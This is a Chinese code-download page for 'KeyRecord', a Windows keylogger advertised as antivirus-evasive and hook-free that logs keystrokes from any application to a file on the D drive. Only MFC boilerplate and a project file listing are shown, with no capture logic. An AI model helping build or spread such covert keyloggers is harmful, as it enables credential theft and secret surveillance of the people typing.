资源简介
免杀、未使用hook钩子 。基于vs2013开发的监控键盘对任何应用程序的操作,日志文件在D盘。key.txt
代码片段和文件信息
// KeyRecord.cpp : 定义应用程序的类行为。
//
#include “stdafx.h“
#include “KeyRecord.h“
#include “KeyRecordDlg.h“
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
// CKeyRecordApp
BEGIN_MESSAGE_MAP(CKeyRecordApp CWinApp)
ON_COMMAND(ID_HELP &CWinApp::onhelp)
END_MESSAGE_MAP()
// CKeyRecordApp 构造
CKeyRecordApp::CKeyRecordApp()
{
// 支持重新启动管理器
m_dwRestartManagerSupportFlags = AFX_RESTART_MANAGER_SUPPORT_RESTART;
// TODO: 在此处添加构造代码,
// 将所有重要的初始化放置在 InitInstance 中
}
// 唯一的一个 CKeyRecordApp 对象
CKeyRecordApp theApp;
// CKeyRecordApp 初始化
BOOL CKeyRecordApp::InitInstance()
{
// 如果一个运行在 Windows XP 上的应用程序清单指定要
// 使用 ComCtl32.dll 版本 6 或更高版本来启用可视化方式,
//则需要 InitCommonControlsEx()。 否则,将无法创建窗口。
INITCOMMONCONTROLSEX InitCtrls;
InitCtrls.dwSize = sizeof(InitCtrls);
// 将它设置为包括所有要在应用程序中使用的
// 公共控件类。
InitCtrls.dwICC = ICC_WIN95_CLASSES;
InitCommonControlsEx(&InitCtrls);
CWinApp::InitInstance();
AfxEnableControlContainer();
// 创建 shell 管理器,以防对话框包含
// 任何 shell 树视图控件或 shell 列表视图控件。
CShellManager *pShellManager = new CShellManager;
// 激活“Windows Native”视觉管理器,以便在 MFC 控件中启用主题
CMFCVisualManager::SetDefaultManager(RUNTIME_CLASS(CMFCVisualManagerWindows));
// 标准初始化
// 如果未使用这些功能并希望减小
// 最终可执行文件的大小,则应移除下列
// 不需要的特定初始化例程
// 更改用于存储设置的注册表项
// TODO: 应适当修改该字符串,
// 例如修改为公司或组织名
SetRegistryKey(_T(“应用程序向导生成的本地应用程序“));
CKeyRecordDlg dlg;
m_pMainWnd = &dlg;
INT_PTR nResponse = dlg.DoModal();
if (nResponse == IDOK)
{
// TODO: 在此放置处理何时用
// “确定”来关闭对话框的代码
}
else if (nResponse == IDCANCEL)
{
// TODO: 在此放置处理何时用
// “取消”来关闭对话框的代码
}
else if (nResponse == -1)
{
TRACE(traceAppMsg 0 “警告: 对话框创建失败,应用程序将意外终止。\n“);
TRACE(traceAppMsg 0 “警告: 如果您在对话框上使用 MFC 控件,则无法 #define _AFX_NO_MFC_CONTROLS_IN_DIALOGS。\n“);
}
// 删除上面创建的 shell 管理器。
if (pShellManager != NULL)
{
delete pShellManager;
}
// 由于对话框已关闭,所以将返回 FALSE 以便退出应用程序,
// 而不是启动应用程序的消息泵。
return FALSE;
}
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
目录 0 2016-01-15 09:15 KeyRecord\
目录 0 2016-01-15 09:15 KeyRecord\Debug\
文件 2062 2016-01-15 09:15 KeyRecord\Debug\KeyRecord.Build.CppClean.log
文件 323 2016-01-15 09:15 KeyRecord\Debug\KeyRecord.log
文件 42365 2016-01-15 09:15 KeyRecord\Debug\KeyRecord.obj
文件 43188224 2016-01-15 09:15 KeyRecord\Debug\KeyRecord.pch
文件 69528 2016-01-15 09:15 KeyRecord\Debug\KeyRecord.res
目录 0 2016-01-15 09:15 KeyRecord\Debug\KeyRecord.tlog\
文件 73060 2016-01-15 09:15 KeyRecord\Debug\KeyRecord.tlog\CL.read.1.tlog
文件 3372 2016-01-15 09:15 KeyRecord\Debug\KeyRecord.tlog\CL.write.1.tlog
文件 204 2016-01-15 09:15 KeyRecord\Debug\KeyRecord.tlog\KeyRecord.lastbuildstate
文件 2696 2016-01-15 09:15 KeyRecord\Debug\KeyRecord.tlog\cl.command.1.tlog
文件 2158 2016-01-15 09:15 KeyRecord\Debug\KeyRecord.tlog\li
文件 5970 2016-01-15 09:15 KeyRecord\Debug\KeyRecord.tlog\li
文件 1366 2016-01-15 09:15 KeyRecord\Debug\KeyRecord.tlog\li
文件 798 2016-01-15 09:15 KeyRecord\Debug\KeyRecord.tlog\rc.command.1.tlog
文件 3200 2016-01-15 09:15 KeyRecord\Debug\KeyRecord.tlog\rc.read.1.tlog
文件 398 2016-01-15 09:15 KeyRecord\Debug\KeyRecord.tlog\rc.write.1.tlog
文件 62877 2016-01-15 09:15 KeyRecord\Debug\KeyRecordDlg.obj
文件 913885 2016-01-15 09:15 KeyRecord\Debug\stdafx.obj
文件 2264064 2016-01-15 09:15 KeyRecord\Debug\vc120.idb
文件 6647808 2016-01-15 09:15 KeyRecord\Debug\vc120.pdb
文件 108684 2016-01-15 09:15 KeyRecord\KeyRecord.aps
文件 2413 2016-01-15 09:15 KeyRecord\KeyRecord.cpp
文件 461 2016-01-15 09:15 KeyRecord\KeyRecord.h
文件 10318 2016-01-15 09:15 KeyRecord\KeyRecord.rc
文件 6157 2016-01-15 09:15 KeyRecord\KeyRecord.vcxproj
文件 2069 2016-01-15 09:15 KeyRecord\KeyRecord.vcxproj.filters
文件 5197 2016-01-15 09:15 KeyRecord\KeyRecordDlg.cpp
文件 724 2016-01-15 09:15 KeyRecord\KeyRecordDlg.h
文件 3899 2016-01-15 09:15 KeyRecord\ReadMe.txt
............此处省略7个文件信息
评论
共有 条评论